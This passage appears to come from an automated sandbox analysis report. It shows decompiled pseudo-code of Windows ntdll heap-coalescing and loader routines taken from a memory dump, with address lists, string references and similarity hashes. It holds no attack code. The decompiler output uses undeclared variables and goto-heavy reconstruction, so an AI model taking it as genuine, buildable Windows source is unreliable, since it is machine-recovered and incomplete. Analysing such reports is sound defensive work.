				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E00B2FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E00B3A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E00ACD540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E00A7B150();
										} else {
											E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E00A7B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0xb66378 = 1;
											asm("int3");
											 *0xb66378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E00A9A229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E00A9A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E00A9BC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E00B3A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E00A9A229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E00A9A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E00ACD540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E00A7B150();
								} else {
									E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E00A7B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0xb66378 = 1;
									asm("int3");
									 *0xb66378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E00B2FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E00B3A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E00ACD540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E00A7B150();
													} else {
														E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E00A7B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0xb66378 = 1;
														asm("int3");
														 *0xb66378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E00A9A229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E00A9A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E00A9BC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E00B3A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E00ACD540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E00A7B150();
													} else {
														E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E00A7B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0xb66378 = 1;
														asm("int3");
														 *0xb66378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E00A9A229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E00A9A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E00A9BC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E00A9BC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}

0x00a999ca
0x00a999cc
0x00a999df
0x00a999e3
0x00a999f8
0x00a999fb
0x00a999fb
0x00000000
0x00a99a48
0x00a99a48
0x00a99a4c
0x00a99a51
0x00a99a55
0x00a99a61
0x00a99a66
0x00a99a68
0x00ae1457
0x00ae145c
0x00ae145c
0x00a99a68
0x00a99a6e
0x00a99a71
0x00a99a74
0x00a99a76
0x00ae1466
0x00ae1469
0x00ae1469
0x00ae146c
0x00ae146e
0x00ae1471
0x00ae1474
0x00ae1477
0x00ae1479
0x00ae159c
0x00ae159c
0x00ae159d
0x00ae15a6
0x00ae15ab
0x00ae15ab
0x00000000
0x00ae15ab
0x00ae147f
0x00ae1481
0x00000000
0x00000000
0x00ae148a
0x00ae148d
0x00ae1493
0x00ae1495
0x00ae14c0
0x00ae14c0
0x00ae14c3
0x00ae14c6
0x00ae14c8
0x00ae14cb
0x00ae14cf
0x00ae14f2
0x00ae14f2
0x00ae14f5
0x00ae14f8
0x00ae1501
0x00ae1508
0x00ae150b
0x00ae150e
0x00ae1510
0x00ae1513
0x00ae1515
0x00ae1515
0x00ae1518
0x00ae1518
0x00ae1513
0x00ae1521
0x00ae1525
0x00ae152a
0x00ae152d
0x00ae1530
0x00ae1532
0x00ae1539
0x00ae153d
0x00ae155d
0x00ae1562
0x00ae153f
0x00ae1555
0x00ae155a
0x00ae1570
0x00ae1577
0x00ae157c
0x00ae1582
0x00ae1585
0x00ae1589
0x00ae158b
0x00ae1592
0x00ae1593
0x00ae1593
0x00ae1589
0x00ae1530
0x00000000
0x00ae14f8
0x00ae14d5
0x00ae14da
0x00ae14dc
0x00000000
0x00ae14de
0x00ae14e8
0x00000000
0x00ae14e8
0x00ae1497
0x00ae1497
0x00ae14a4
0x00ae14a4
0x00ae14a7
0x00ae14a9
0x00ae14ab
0x00ae14ab
0x00ae149c
0x00ae149e
0x00ae14a0
0x00ae14b0
0x00ae14b0
0x00000000
0x00ae14a2
0x00ae14a2
0x00000000
0x00ae14a2
0x00ae14a0
0x00ae14b3
0x00ae14bb
0x00000000
0x00ae14bb
0x00ae1495
0x00a99a7c
0x00a99a7c
0x00a99a7f
0x00a99a7f
0x00a99a82
0x00a99a84
0x00a99a87
0x00a99a8a
0x00a99a8d
0x00a99a8f
0x00ae166a
0x00ae166a
0x00ae166b
0x00ae1674
0x00000000
0x00ae1674
0x00a99a95
0x00a99a97
0x00000000
0x00000000
0x00a99aa0
0x00a99aa3
0x00a99aa9
0x00a99aab
0x00a99ad7
0x00a99ad7
0x00a99ada
0x00a99add
0x00a99adf
0x00a99ae2
0x00a99ae6
0x00a99b22
0x00a99b27
0x00a99b29
0x00000000
0x00a99b2b
0x00ae15be
0x00000000
0x00ae15be
0x00a99b29
0x00a99ae8
0x00a99ae8
0x00a99aeb
0x00a99aee
0x00ae15cb
0x00ae15d2
0x00ae15d5
0x00ae15d7
0x00ae15da
0x00ae15dc
0x00ae15dc
0x00ae15dc
0x00ae15da
0x00ae15e5
0x00ae15e9
0x00ae15ee
0x00ae15f1
0x00ae15f3
0x00ae15f9
0x00ae1600
0x00ae1604
0x00ae1624
0x00ae1629
0x00ae1606
0x00ae161c
0x00ae1621
0x00ae1637
0x00ae163e
0x00ae1643
0x00ae1649
0x00ae164c
0x00ae1650
0x00ae1656
0x00ae165d
0x00ae165e
0x00ae165e
0x00ae1650
0x00ae15f3
0x00a99af4
0x00a99af7
0x00a99afc
0x00a99b00
0x00a99b04
0x00a99b08
0x00a99b14
0x00a999fe
0x00a99a04
0x00a99a07
0x00000000
0x00a99a29
0x00ae169c
0x00ae16a0
0x00ae16a5
0x00ae16a9
0x00ae16b5
0x00ae16ba
0x00ae16bc
0x00ae16be
0x00ae16c3
0x00ae16c3
0x00ae16bc
0x00ae16c8
0x00ae16cc
0x00ae181b
0x00ae181b
0x00ae181e
0x00ae181e
0x00ae1821
0x00ae1823
0x00ae1826
0x00ae1829
0x00ae182c
0x00ae182e
0x00ae1688
0x00ae1688
0x00ae1689
0x00ae168b
0x00ae168c
0x00ae168d
0x00ae168f
0x00ae1692
0x00000000
0x00ae1692
0x00ae1834
0x00ae1836
0x00000000
0x00000000
0x00ae183f
0x00ae1842
0x00ae1848
0x00ae184a
0x00ae1875
0x00ae1875
0x00ae1878
0x00ae187b
0x00ae187d
0x00ae1880
0x00ae1884
0x00ae18a7
0x00ae18a7
0x00ae18aa
0x00ae18ad
0x00ae18b6
0x00ae18bd
0x00ae18c0
0x00ae18c3
0x00ae18c5
0x00ae18c8
0x00ae18ca
0x00ae18ca
0x00ae18cd
0x00ae18cd
0x00ae18c8
0x00ae18d5
0x00ae18da
0x00ae18df
0x00ae18e2
0x00ae18e5
0x00ae18e7
0x00ae18ee
0x00ae18f2
0x00ae1912
0x00ae1917
0x00ae18f4
0x00ae190a
0x00ae190f
0x00ae1925
0x00ae192c
0x00ae1931
0x00ae193a
0x00ae193e
0x00ae1940
0x00ae1947
0x00ae1948
0x00ae1948
0x00ae193e
0x00ae18e5
0x00ae194f
0x00ae1952
0x00ae1956
0x00ae195d
0x00ae1961
0x00ae196d
0x00000000
0x00ae196d
0x00ae188a
0x00ae188f
0x00ae1891
0x00000000
0x00000000
0x00ae189d
0x00000000
0x00ae189d
0x00ae184c
0x00ae1859
0x00ae1859
0x00ae185c
0x00000000
0x00000000
0x00ae1851
0x00ae1853
0x00ae1855
0x00ae1865
0x00ae1865
0x00ae1866
0x00ae1868
0x00ae1870
0x00000000
0x00ae1870
0x00ae1857
0x00ae1857
0x00ae185e
0x00000000
0x00ae16d2
0x00ae16d2
0x00ae16d5
0x00ae16d5
0x00ae16d8
0x00ae16da
0x00ae16dd
0x00ae16e0
0x00ae16e3
0x00ae16e5
0x00ae1808
0x00ae1808
0x00ae1809
0x00ae1812
0x00ae1817
0x00ae1817
0x00000000
0x00ae1817
0x00ae16eb
0x00ae16ed
0x00000000
0x00000000
0x00ae16f6
0x00ae16f9
0x00ae16ff
0x00ae1701
0x00ae172c
0x00ae172c
0x00ae172f
0x00ae1732
0x00ae1734
0x00ae1737
0x00ae173b
0x00ae175e
0x00ae175e
0x00ae1761
0x00ae1764
0x00ae176d
0x00ae1774
0x00ae1777
0x00ae177a
0x00ae177c
0x00ae177f
0x00ae1781
0x00ae1781
0x00ae1784
0x00ae1784
0x00ae177f
0x00ae178c
0x00ae1791
0x00ae1796
0x00ae1799
0x00ae179c
0x00ae179e
0x00ae17a5
0x00ae17a9
0x00ae17c9
0x00ae17ce
0x00ae17ab
0x00ae17c1
0x00ae17c6
0x00ae17dc
0x00ae17e3
0x00ae17e8
0x00ae17ee
0x00ae17f1
0x00ae17f5
0x00ae17f7
0x00ae17fe
0x00ae17ff
0x00ae17ff
0x00ae17f5
0x00ae179c
0x00000000
0x00ae1764
0x00ae1741
0x00ae1746
0x00ae1748
0x00000000
0x00000000
0x00ae1754
0x00000000
0x00ae1754
0x00ae1703
0x00ae1710
0x00ae1710
0x00ae1713
0x00000000
0x00000000
0x00ae1708
0x00ae170a
0x00ae170c
0x00ae171c
0x00ae171c
0x00ae171d
0x00ae171f
0x00ae1727
0x00000000
0x00ae1727
0x00ae170e
0x00ae170e
0x00ae1715
0x00000000
0x00ae1715
0x00ae16cc
0x00a99a45
0x00a99a45
0x00a99a0e
0x00a99a1c
0x00a99a23
0x00ae167e
0x00ae167f
0x00ae1681
0x00ae1683
0x00ae1684
0x00000000
0x00ae1684
0x00000000
0x00a99aad
0x00a99aad
0x00a99ab0
0x00a99ab3
0x00a99ab3
0x00a99ab6
0x00000000
0x00000000
0x00a99ab8
0x00a99aba
0x00a99abc
0x00a99ac8
0x00a99ac8
0x00000000
0x00a99abe
0x00a99abe
0x00a99ac0
0x00000000
0x00a99ac0
0x00a99abc
0x00a99ad2
0x00000000
0x00a99ad2
0x00a99aab

Strings

HEAP: , xrefs: 00AE155D, 00AE1624, 00AE17C9, 00AE1912
HEAP[%wZ]: , xrefs: 00AE1550, 00AE1617, 00AE17BC, 00AE1905
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 00AE1572, 00AE1639, 00AE17DE, 00AE1927

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: c80bb2d2646d2f87d2c98e59d0395c1b8a9d98db796ea131eff96cce919a695d
Instruction ID: 9c15e1555ec114ed4880a5d74b32e280c7a746c80e4ad7a92f3bc1e2b5930dd4
Opcode Fuzzy Hash: c80bb2d2646d2f87d2c98e59d0395c1b8a9d98db796ea131eff96cce919a695d
Instruction Fuzzy Hash: 1C22DE70700295AFDB24CF2AC895B7ABBF5EF44704F24856DE8868B382E775D885CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A88794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00A88794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E00A8934A() != 0) {
								_t159 = E00AFA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0xb65780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E00AF5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0xb65780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E00A8849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E00A88999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E00A88999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0xb65c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0xb65c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E00A92280(_t92, 0xb686cc);
															_t94 = E00B49DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E00AA61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
